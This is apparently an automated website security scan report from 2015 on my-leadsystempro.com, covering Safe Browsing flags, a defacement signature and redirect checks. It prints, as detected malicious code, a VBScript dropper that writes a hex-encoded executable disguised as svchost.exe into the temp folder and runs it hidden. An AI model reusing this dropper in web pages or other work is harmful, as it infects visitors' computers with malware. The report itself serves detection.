Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=my-leadsystempro.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://my-leadsystempro.com/ | 200 OK Content-Length: 123975 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
Deface/Content modification. The following signature was found: Hacked By The Syrian Revolution Soldiers ...[64 bytes skipped]... shortcut icon" type="image/vnd.microsoft.icon" /> </head> <body> <div id="container"> <div id="logo" class="shadowed" title="The Syrian Revolution Soldiers مجهولو سوريا"> <font color="#FFFFFF"> <title>Hacked By The Syrian Revolution Soldiers</title> <link href='http://fonts.googleapis.com/css?family=Tahoma:700' rel='stylesheet' type='text/css'> </font> <p align="center"><font color="#FFFFFF"> <!-- no txt inicio --><script language="Javascript"> <!-- Begin function disableselect(e){ return false } function reEnable(){ return true } document.onselectstart=new Function ("return false") if ...[125358 bytes skipped]... | ||
http://my-leadsystempro.com/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: my-leadsystempro.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 08 Jul 2015 08:45:05 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=af7todn37jb6eeo01ovoiti340; path=/
Set-Cookie: wpgb_visit_last_php-default=1436345106; expires=Thu, 07-Jul-2016 08:45:06 GMT; path=/
X-Pingback: http://my-leadsystempro.com/xmlrpc.php
GET / HTTP/1.1
Host: my-leadsystempro.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 08 Jul 2015 08:45:05 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=af7todn37jb6eeo01ovoiti340; path=/
Set-Cookie: wpgb_visit_last_php-default=1436345106; expires=Thu, 07-Jul-2016 08:45:06 GMT; path=/
X-Pingback: http://my-leadsystempro.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: my-leadsystempro.com
Referer: http://www.google.com/search?q=my-leadsystempro.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: my-leadsystempro.com
Referer: http://www.google.com/search?q=my-leadsystempro.com
Result:
The result is similar to the first query. There are no suspicious redirects found.